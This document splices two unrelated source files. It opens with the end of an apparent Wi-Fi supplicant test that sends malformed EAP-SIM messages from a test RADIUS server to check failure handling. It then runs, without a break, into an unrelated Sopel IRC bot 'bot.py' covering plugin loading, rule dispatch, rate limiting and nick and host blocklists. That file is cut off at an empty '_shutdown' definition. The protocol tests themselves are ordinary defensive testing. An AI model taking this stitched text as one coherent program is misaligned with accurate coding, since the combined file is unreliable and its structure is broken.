return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 4 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Same RAND multiple times in Challenge")
return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 3 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_SIM, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(sim_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 25):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
|
bot.py | # Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import generator_stop
from ast import literal_eval
from datetime import datetime
import inspect
import itertools
import logging
import re
import signal
import threading
import time
from types import MappingProxyType
from typing import Mapping, Optional
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
from sopel.irc import modes
import sopel.loader
from sopel.plugin import NOLIMIT
from sopel.plugins import jobs as plugin_jobs, rules as plugin_rules
from sopel.tools import deprecated, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
QUIT_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR1', 'SIGTERM', 'SIGINT']
if hasattr(signal, name)
]
RESTART_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR2', 'SIGILL']
if hasattr(signal, name)
]
SIGNALS = QUIT_SIGNALS + RESTART_SIGNALS
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super().__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
self._running_triggers = []
self._running_triggers_lock = threading.Lock()
self._plugins = {}
self._rules_manager = plugin_rules.Manager()
self._scheduler = plugin_jobs.Scheduler(self)
self._url_callbacks = tools.SopelMemory()
"""Tracking of manually registered URL callbacks.
Should be manipulated only by use of :meth:`register_url_callback` and
:meth:`unregister_url_callback` methods, which are deprecated.
Remove in Sopel 9, along with the above related methods.
"""
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
function names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set.
"""
self.modeparser = modes.ModeParser()
"""A mode parser used to parse ``MODE`` messages and modestrings."""
self.channels = tools.SopelIdentifierMemory()
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelIdentifierMemory()
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must share at least one mutual channel.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
plugins. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
@property
def rules(self):
"""Rules manager."""
return self._rules_manager
@property
def scheduler(self):
"""Job Scheduler. See :func:`sopel.plugin.interval`."""
return self._scheduler
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# This was supposed to be deprecated, but the built-in help plugin needs it
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
result = {}
for plugin, commands in plugin_commands:
if plugin not in result:
result[plugin] = list(sorted(commands.keys()))
else:
result[plugin].extend(commands.keys())
result[plugin] = list(sorted(result[plugin]))
return result
@property
def doc(self):
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
commands = (
(command, command.get_doc(), command.get_usages())
for plugin, commands in plugin_commands
for command in commands.values()
)
return dict(
(name, (doc.splitlines(), [u['text'] for u in usages]))
for command, doc, usages in commands
for name in ((command.name,) + command.aliases)
)
@property
def hostmask(self) -> Optional[str]:
"""The current hostmask for the bot :class:`~sopel.tools.target.User`.
:return: the bot's current hostmask if the bot is connected and in
a least one channel; ``None`` otherwise
:rtype: Optional[str]
"""
if not self.users or self.nick not in self.users:
# bot must be connected and in at least one channel
return None
return self.users.get(self.nick).hostmask
@property
def plugins(self) -> Mapping[str, plugins.handlers.AbstractPluginHandler]:
"""A dict of the bot's currently loaded plugins.
:return: an immutable map of plugin name to plugin object
"""
return MappingProxyType(self._plugins)
def has_channel_privilege(self, channel, privilege):
"""Tell if the bot has a ``privilege`` level or above in a ``channel``.
:param str channel: a channel the bot is in
:param int privilege: privilege level to check
:raise ValueError: when the channel is unknown
This method checks the bot's privilege level in a channel, i.e. if it
has this level or higher privileges::
>>> bot.channels['#chan'].privileges[bot.nick] = plugin.OP
>>> bot.has_channel_privilege('#chan', plugin.VOICE)
True
The ``channel`` argument can be either a :class:`str` or a
:class:`sopel.tools.Identifier`, as long as Sopel joined said channel.
If the channel is unknown, a :exc:`ValueError` will be raised.
"""
if channel not in self.channels:
raise ValueError('Unknown channel %s' % channel)
return self.channels[channel].has_privilege(self.nick, privilege)
# signal handlers
def set_signal_handlers(self):
"""Set signal handlers for the bot.
Before running the bot, this method can be called from the main thread
to setup signals. If the bot is connected, upon receiving a signal it
will send a ``QUIT`` message. Otherwise, it raises a
:exc:`KeyboardInterrupt` error.
.. note::
Per the Python documentation of :func:`signal.signal`:
When threads are enabled, this function can only be called from
the main thread; attempting to call it from other threads will
cause a :exc:`ValueError` exception to be raised.
"""
for obj in SIGNALS:
signal.signal(obj, self._signal_handler)
def _signal_handler(self, sig, frame):
if sig in QUIT_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got quit signal, sending QUIT to server.")
self.quit('Closing')
else:
self.hasquit = True # mark the bot as "want to quit"
LOGGER.warning("Got quit signal.")
raise KeyboardInterrupt
elif sig in RESTART_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got restart signal, sending QUIT to server.")
self.restart('Restarting')
else:
LOGGER.warning("Got restart signal.")
self.wantsrestart = True # mark the bot as "want to restart"
self.hasquit = True # mark the bot as "want to quit"
raise KeyboardInterrupt
# setup
def setup(self):
"""Set up Sopel bot before it can run.
The setup phase is in charge of:
* setting up logging (configure Python's built-in :mod:`logging`)
* setting up the bot's plugins (load, setup, and register)
* starting the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.post_setup()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
"""Load plugins into the bot."""
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info("Loading plugins...")
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error loading %s: %s", name, e)
except SystemExit:
load_error = load_error + 1
LOGGER.exception(
"Error loading %s (plugin tried to exit)", name)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error in %s setup: %s", name, e)
else:
load_success = load_success + 1
LOGGER.info("Plugin loaded: %s", name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
"Registered %d plugins, %d failed, %d disabled",
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
# post setup
def post_setup(self):
"""Perform post-setup actions.
This method handles everything that should happen after all the plugins
are loaded, and before the bot can connect to the IRC server.
At the moment, this method checks for undefined configuration options,
and starts the job scheduler.
.. versionadded:: 7.1
"""
settings = self.settings
for section_name, section in settings.get_defined_sections():
defined_options = {
settings.parser.optionxform(opt)
for opt, _ in inspect.getmembers(section)
if not opt.startswith('_')
}
for option_name in settings.parser.options(section_name):
if option_name not in defined_options:
LOGGER.warning(
"Config option `%s.%s` is not defined by its section "
"and may not be recognized by Sopel.",
section_name,
option_name,
)
self._scheduler.start()
# plugins management
def reload_plugin(self, name):
"""Reload a plugin.
:param str name: name of the plugin to reload
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
This function runs the plugin's shutdown routine and unregisters the
plugin from the bot. Then this function reloads the plugin, runs its
setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def reload_plugins(self):
"""Reload all registered plugins.
First, this function runs all plugin shutdown routines and unregisters
all plugins. Then it reloads all plugins, runs their setup routines, and
registers them again.
"""
registered = list(self._plugins.items())
# tear down all plugins
for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry.
:param plugin: loaded plugin to add
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
self._plugins[plugin.name] = plugin
self.register_callables(callables)
self.register_jobs(jobs)
self.register_shutdowns(shutdowns)
self.register_urls(urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry.
:param plugin: loaded plugin to remove
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove plugin rules, jobs, shutdown functions, and url callbacks
self._rules_manager.unregister_plugin(name)
self._scheduler.unregister_plugin(name)
self.unregister_shutdowns(shutdowns)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Check if the bot has registered a plugin of the specified name.
:param str name: name of the plugin to check for
:return: whether the bot has a plugin named ``name`` registered
:rtype: bool
"""
return name in self._plugins
def get_plugin_meta(self, name):
"""Get info about a registered plugin by its name.
:param str name: name of the plugin about which to get info
:return: the plugin's metadata
(see :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
:rtype: :class:`dict`
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
return self._plugins[name].get_meta_description()
# callable management
def register_callables(self, callables):
match_any = re.compile(r'.*')
settings = self.settings
for callbl in callables:
rules = getattr(callbl, 'rule', [])
lazy_rules = getattr(callbl, 'rule_lazy_loaders', [])
find_rules = getattr(callbl, 'find_rules', [])
lazy_find_rules = getattr(callbl, 'find_rules_lazy_loaders', [])
search_rules = getattr(callbl, 'search_rules', [])
lazy_search_rules = getattr(callbl, 'search_rules_lazy_loaders', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
is_rule = any([
rules,
lazy_rules,
find_rules,
lazy_find_rules,
search_rules,
lazy_search_rules,
])
is_command = any([commands, nick_commands, action_commands])
if rules:
rule = plugin_rules.Rule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_rules:
try:
rule = plugin_rules.Rule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register rule: %s', err)
if find_rules:
rule = plugin_rules.FindRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_find_rules:
try:
rule = plugin_rules.FindRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register find rule: %s', err)
if search_rules:
rule = plugin_rules.SearchRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_search_rules:
try:
rule = plugin_rules.SearchRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register search rule: %s', err)
if commands:
rule = plugin_rules.Command.from_callable(settings, callbl)
self._rules_manager.register_command(rule)
if nick_commands:
rule = plugin_rules.NickCommand.from_callable(
settings, callbl)
self._rules_manager.register_nick_command(rule)
if action_commands:
rule = plugin_rules.ActionCommand.from_callable(
settings, callbl)
self._rules_manager.register_action_command(rule)
if not is_command and not is_rule:
callbl.rule = [match_any]
self._rules_manager.register(
plugin_rules.Rule.from_callable(self.settings, callbl))
def register_jobs(self, jobs):
for func in jobs:
job = sopel.tools.jobs.Job.from_callable(self.settings, func)
self._scheduler.register(job)
def unregister_jobs(self, jobs):
for job in jobs:
self._scheduler.remove_callable_job(job)
def register_shutdowns(self, shutdowns):
# Append plugin's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods = self.shutdown_methods + list(shutdowns)
def unregister_shutdowns(self, shutdowns):
self.shutdown_methods = [
shutdown
for shutdown in self.shutdown_methods
if shutdown not in shutdowns
]
def register_urls(self, urls):
for func in urls:
url_regex = getattr(func, 'url_regex', [])
url_lazy_loaders = getattr(func, 'url_lazy_loaders', None)
if url_regex:
rule = plugin_rules.URLCallback.from_callable(
self.settings, func)
self._rules_manager.register_url_callback(rule)
if url_lazy_loaders:
try:
rule = plugin_rules.URLCallback.from_callable_lazy(
self.settings, func)
self._rules_manager.register_url_callback(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error("Cannot register URL callback: %s", err)
# message dispatch
def call_rule(self, rule, sopel, trigger):
# rate limiting
if not trigger.admin and not rule.is_unblockable():
if rule.is_rate_limited(trigger.nick):
return
if not trigger.is_privmsg and rule.is_channel_rate_limited(trigger.sender):
return
if rule.is_global_rate_limited():
return
# channel config
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
if '*' in disabled_plugins:
return
elif rule.get_plugin_name() in disabled_plugins:
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
disabled_commands = disabled_commands.get(rule.get_plugin_name(), [])
if rule.get_rule_label() in disabled_commands:
return
try:
rule.execute(sopel, trigger)
except KeyboardInterrupt:
raise
except Exception as error:
self.error(trigger, exception=error)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate limits or other restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded plugins/plugin methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
LOGGER.debug(
"Evaluating configuration for %s.%s in channel %s",
func.plugin_name, func.__name__, trigger.sender
)
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
# if "*" is used, we are disabling all plugins on provided channel
if '*' in disabled_plugins:
LOGGER.debug(
"All plugins disabled in %s; skipping execution of %s.%s",
trigger.sender, func.plugin_name, func.__name__
)
return
if func.plugin_name in disabled_plugins:
LOGGER.debug(
"Plugin %s is disabled in %s; skipping execution of %s",
func.plugin_name, trigger.sender, func.__name__
)
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.plugin_name in disabled_commands:
if func.__name__ in disabled_commands[func.plugin_name]:
LOGGER.debug(
"Skipping execution of %s.%s in %s: disabled_commands matched",
func.plugin_name, func.__name__, trigger.sender
)
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param pretrigger: a parsed message from the server
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
The ``pretrigger`` (a parsed message) is used to find matching rules;
it will retrieve them by order of priority, and execute them. It runs
triggered rules in separate threads, unless they are marked otherwise.
However, it won't run triggered blockable rules at all when they can't
be executed for blocked nickname or hostname.
.. seealso::
The pattern matching is done by the
:class:`Rules Manager<sopel.plugins.rules.Manager>`.
"""
# list of commands running in separate threads for this dispatch
running_triggers = []
# nickname/hostname blocking
nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_rules = set()
# account info
nick = pretrigger.nick
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
# skip processing replayed messages
if "time" in pretrigger.tags and pretrigger.sender in self.channels:
join_time = self.channels[pretrigger.sender].join_time
if join_time is not None and pretrigger.time < join_time:
return
for rule, match in self._rules_manager.get_triggered_rules(self, pretrigger):
trigger = Trigger(self.settings, pretrigger, match, account)
is_unblockable = trigger.admin or rule.is_unblockable()
if blocked and not is_unblockable:
list_of_blocked_rules.add(str(rule))
continue
wrapper = SopelWrapper(
self, trigger, output_prefix=rule.get_output_prefix())
if rule.is_threaded():
# run in a separate thread
targs = (rule, wrapper, trigger)
t = threading.Thread(target=self.call_rule, args=targs)
plugin_name = rule.get_plugin_name()
rule_label = rule.get_rule_label()
t.name = '%s-%s-%s' % (t.name, plugin_name, rule_label)
t.start()
running_triggers.append(t)
else:
# direct call
self.call_rule(rule, wrapper, trigger)
# update currently running triggers
self._update_running_triggers(running_triggers)
if list_of_blocked_rules:
if nick_blocked and host_blocked:
block_type = 'both blocklists'
elif nick_blocked:
block_type = 'nick blocklist'
else:
block_type = 'host blocklist'
LOGGER.debug(
"%s prevented from using %s by %s.",
pretrigger.nick,
', '.join(list_of_blocked_rules),
block_type,
)
@property
def running_triggers(self):
"""Current active threads for triggers.
:return: the running thread(s) currently processing trigger(s)
:rtype: :term:`iterable`
This is for testing and debugging purposes only.
"""
with self._running_triggers_lock:
return [t for t in self._running_triggers if t.is_alive()]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
# event handlers
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
:param scheduler: the job scheduler that errored
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
"""Called when a job from the Job Scheduler fails.
:param scheduler: the job scheduler responsible for the errored ``job``
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param job: the Job that errored
:type job: :class:`sopel.tools.jobs.Job`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error.
:param trigger: the ``Trigger``\\ing line (if available)
:type trigger: :class:`sopel.trigger.Trigger`
:param Exception exception: the exception raised by the error (if
available)
"""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.utcnow()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
